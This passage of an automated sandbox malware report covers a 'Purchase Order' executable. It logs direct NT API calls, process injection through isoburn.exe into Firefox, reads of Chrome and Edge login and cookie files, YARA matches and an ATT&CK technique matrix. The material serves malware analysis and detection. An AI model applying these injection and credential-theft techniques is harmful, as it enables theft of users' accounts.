                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189E5CF mov eax, dword ptr fs:[00000030h]3_2_0189E5CF
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189E5CF mov eax, dword ptr fs:[00000030h]3_2_0189E5CF
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018665D0 mov eax, dword ptr fs:[00000030h]3_2_018665D0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189A5D0 mov eax, dword ptr fs:[00000030h]3_2_0189A5D0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189A5D0 mov eax, dword ptr fs:[00000030h]3_2_0189A5D0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189C5ED mov eax, dword ptr fs:[00000030h]3_2_0189C5ED
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189C5ED mov eax, dword ptr fs:[00000030h]3_2_0189C5ED
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018625E0 mov eax, dword ptr fs:[00000030h]3_2_018625E0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0188E5E7 mov eax, dword ptr fs:[00000030h]3_2_0188E5E7
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0188E5E7 mov eax, dword ptr fs:[00000030h]3_2_0188E5E7
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0188E5E7 mov eax, dword ptr fs:[00000030h]3_2_0188E5E7
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0188E5E7 mov eax, dword ptr fs:[00000030h]3_2_0188E5E7
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0188E5E7 mov eax, dword ptr fs:[00000030h]3_2_0188E5E7
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0188E5E7 mov eax, dword ptr fs:[00000030h]3_2_0188E5E7
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0188E5E7 mov eax, dword ptr fs:[00000030h]3_2_0188E5E7
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0188E5E7 mov eax, dword ptr fs:[00000030h]3_2_0188E5E7
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018F6500 mov eax, dword ptr fs:[00000030h]3_2_018F6500
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01934500 mov eax, dword ptr fs:[00000030h]3_2_01934500
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01934500 mov eax, dword ptr fs:[00000030h]3_2_01934500
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01934500 mov eax, dword ptr fs:[00000030h]3_2_01934500
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01934500 mov eax, dword ptr fs:[00000030h]3_2_01934500
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01934500 mov eax, dword ptr fs:[00000030h]3_2_01934500
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01934500 mov eax, dword ptr fs:[00000030h]3_2_01934500
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01934500 mov eax, dword ptr fs:[00000030h]3_2_01934500
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01870535 mov eax, dword ptr fs:[00000030h]3_2_01870535
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01870535 mov eax, dword ptr fs:[00000030h]3_2_01870535
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01870535 mov eax, dword ptr fs:[00000030h]3_2_01870535
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01870535 mov eax, dword ptr fs:[00000030h]3_2_01870535
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01870535 mov eax, dword ptr fs:[00000030h]3_2_01870535
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01870535 mov eax, dword ptr fs:[00000030h]3_2_01870535
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0188E53E mov eax, dword ptr fs:[00000030h]3_2_0188E53E
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0188E53E mov eax, dword ptr fs:[00000030h]3_2_0188E53E
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0188E53E mov eax, dword ptr fs:[00000030h]3_2_0188E53E
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0188E53E mov eax, dword ptr fs:[00000030h]3_2_0188E53E
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0188E53E mov eax, dword ptr fs:[00000030h]3_2_0188E53E
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01868550 mov eax, dword ptr fs:[00000030h]3_2_01868550
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01868550 mov eax, dword ptr fs:[00000030h]3_2_01868550
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189656A mov eax, dword ptr fs:[00000030h]3_2_0189656A
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189656A mov eax, dword ptr fs:[00000030h]3_2_0189656A
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189656A mov eax, dword ptr fs:[00000030h]3_2_0189656A
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0191A49A mov eax, dword ptr fs:[00000030h]3_2_0191A49A
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018664AB mov eax, dword ptr fs:[00000030h]3_2_018664AB
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018944B0 mov ecx, dword ptr fs:[00000030h]3_2_018944B0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018EA4B0 mov eax, dword ptr fs:[00000030h]3_2_018EA4B0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018604E5 mov ecx, dword ptr fs:[00000030h]3_2_018604E5
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01898402 mov eax, dword ptr fs:[00000030h]3_2_01898402
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01898402 mov eax, dword ptr fs:[00000030h]3_2_01898402
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01898402 mov eax, dword ptr fs:[00000030h]3_2_01898402
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0185C427 mov eax, dword ptr fs:[00000030h]3_2_0185C427
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0185E420 mov eax, dword ptr fs:[00000030h]3_2_0185E420
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0185E420 mov eax, dword ptr fs:[00000030h]3_2_0185E420
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0185E420 mov eax, dword ptr fs:[00000030h]3_2_0185E420
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E6420 mov eax, dword ptr fs:[00000030h]3_2_018E6420
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E6420 mov eax, dword ptr fs:[00000030h]3_2_018E6420
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E6420 mov eax, dword ptr fs:[00000030h]3_2_018E6420
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E6420 mov eax, dword ptr fs:[00000030h]3_2_018E6420
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E6420 mov eax, dword ptr fs:[00000030h]3_2_018E6420
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E6420 mov eax, dword ptr fs:[00000030h]3_2_018E6420
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E6420 mov eax, dword ptr fs:[00000030h]3_2_018E6420
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189A430 mov eax, dword ptr fs:[00000030h]3_2_0189A430
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0191A456 mov eax, dword ptr fs:[00000030h]3_2_0191A456
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189E443 mov eax, dword ptr fs:[00000030h]3_2_0189E443
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189E443 mov eax, dword ptr fs:[00000030h]3_2_0189E443
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189E443 mov eax, dword ptr fs:[00000030h]3_2_0189E443
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189E443 mov eax, dword ptr fs:[00000030h]3_2_0189E443
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189E443 mov eax, dword ptr fs:[00000030h]3_2_0189E443
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189E443 mov eax, dword ptr fs:[00000030h]3_2_0189E443
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189E443 mov eax, dword ptr fs:[00000030h]3_2_0189E443
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189E443 mov eax, dword ptr fs:[00000030h]3_2_0189E443
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0188245A mov eax, dword ptr fs:[00000030h]3_2_0188245A
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0185645D mov eax, dword ptr fs:[00000030h]3_2_0185645D
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018EC460 mov ecx, dword ptr fs:[00000030h]3_2_018EC460
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0188A470 mov eax, dword ptr fs:[00000030h]3_2_0188A470
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0188A470 mov eax, dword ptr fs:[00000030h]3_2_0188A470
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0188A470 mov eax, dword ptr fs:[00000030h]3_2_0188A470
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190678E mov eax, dword ptr fs:[00000030h]3_2_0190678E
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018607AF mov eax, dword ptr fs:[00000030h]3_2_018607AF
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_019147A0 mov eax, dword ptr fs:[00000030h]3_2_019147A0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186C7C0 mov eax, dword ptr fs:[00000030h]3_2_0186C7C0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E07C3 mov eax, dword ptr fs:[00000030h]3_2_018E07C3
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018827ED mov eax, dword ptr fs:[00000030h]3_2_018827ED
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018827ED mov eax, dword ptr fs:[00000030h]3_2_018827ED
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018827ED mov eax, dword ptr fs:[00000030h]3_2_018827ED
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018EE7E1 mov eax, dword ptr fs:[00000030h]3_2_018EE7E1
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018647FB mov eax, dword ptr fs:[00000030h]3_2_018647FB
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018647FB mov eax, dword ptr fs:[00000030h]3_2_018647FB
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189C700 mov eax, dword ptr fs:[00000030h]3_2_0189C700
                Source: C:\Users\user\Desktop\Purchase Order..exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtCreateMutant: Direct from: 0x774635CC
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtWriteVirtualMemory: Direct from: 0x77462E3C
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtMapViewOfSection: Direct from: 0x77462D1C
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtResumeThread: Direct from: 0x774636AC
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtProtectVirtualMemory: Direct from: 0x77462F9C
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtSetInformationProcess: Direct from: 0x77462C5C
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtSetInformationThread: Direct from: 0x774563F9
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtNotifyChangeKey: Direct from: 0x77463C2C
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtProtectVirtualMemory: Direct from: 0x77457B2E
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtAllocateVirtualMemory: Direct from: 0x77462BFC
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtQueryInformationProcess: Direct from: 0x77462C26
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtResumeThread: Direct from: 0x77462FBC
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtReadFile: Direct from: 0x77462ADC
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtQuerySystemInformation: Direct from: 0x77462DFC
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtDelayExecution: Direct from: 0x77462DDC
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtAllocateVirtualMemory: Direct from: 0x77463C9C
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtClose: Direct from: 0x77462B6C
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtCreateUserProcess: Direct from: 0x7746371C
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtWriteVirtualMemory: Direct from: 0x7746490C
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtAllocateVirtualMemory: Direct from: 0x774648EC
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtQuerySystemInformation: Direct from: 0x774648CC
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtQueryVolumeInformationFile: Direct from: 0x77462F2C
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtReadVirtualMemory: Direct from: 0x77462E8C
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtCreateKey: Direct from: 0x77462C6C
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtSetInformationThread: Direct from: 0x77462B4C
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtQueryAttributesFile: Direct from: 0x77462E6C
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtDeviceIoControlFile: Direct from: 0x77462AEC
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtOpenSection: Direct from: 0x77462E0C
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtCreateFile: Direct from: 0x77462FEC
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtOpenFile: Direct from: 0x77462DCC
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtQueryInformationToken: Direct from: 0x77462CAC
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe NtTerminateThread: Direct from: 0x77462FCC
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtAllocateVirtualMemory: Direct from: 0x77462BECJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exe | Section loaded: NULL target: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\Purchase Order..exe | Section loaded: NULL target: C:\Windows\SysWOW64\isoburn.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\isoburn.exe | Section loaded: NULL target: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe protection: read write
                Source: C:\Windows\SysWOW64\isoburn.exe | Section loaded: NULL target: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\isoburn.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\isoburn.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\isoburn.exe | Thread register set: target process: 4936
                Source: C:\Windows\SysWOW64\isoburn.exe | Thread APC queued: target process: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                Source: C:\Users\user\Desktop\Purchase Order..exe | Process created: C:\Users\user\Desktop\Purchase Order..exe "C:\Users\user\Desktop\Purchase Order..exe"
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe | Process created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"
                Source: C:\Windows\SysWOW64\isoburn.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: jfBrBcvTIMPfDU.exe, 00000005.00000002.2661131947.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000005.00000000.1754096305.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000009.00000002.2661177978.0000000001271000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: jfBrBcvTIMPfDU.exe, 00000005.00000002.2661131947.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000005.00000000.1754096305.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000009.00000002.2661177978.0000000001271000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: jfBrBcvTIMPfDU.exe, 00000005.00000002.2661131947.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000005.00000000.1754096305.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000009.00000002.2661177978.0000000001271000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: 0Program Manager
                Source: jfBrBcvTIMPfDU.exe, 00000005.00000002.2661131947.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000005.00000000.1754096305.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000009.00000002.2661177978.0000000001271000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Purchase Order..exe | Queries volume information: C:\Users\user\Desktop\Purchase Order..exe VolumeInformation
                Source: C:\Users\user\Desktop\Purchase Order..exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\Purchase Order..exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\Purchase Order..exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\Purchase Order..exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\Purchase Order..exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\Purchase Order..exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match | File source: 3.2.Purchase Order..exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.Purchase Order..exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000003.00000002.1834862931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.2659993689.0000000000A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.1836694214.0000000001B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.2659764496.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.1836855226.0000000003140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\isoburn.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\isoburn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\isoburn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\isoburn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\isoburn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\isoburn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\isoburn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\isoburn.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\isoburn.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match | File source: 3.2.Purchase Order..exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.Purchase Order..exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000003.00000002.1834862931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.2659993689.0000000000A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.1836694214.0000000001B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.2659764496.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.1836855226.0000000003140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Privilege Escalation: 312 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 41 Virtualization/Sandbox Evasion; 312 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 4 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
                Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                Discovery: 121 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 113 System Information Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                Collection: 1 Email Collection; 1 Archive Collected Data; 1 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                Command and Control: 1 Encrypted Channel; 4 Ingress Tool Transfer; 5 Non-Application Layer Protocol; 5 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
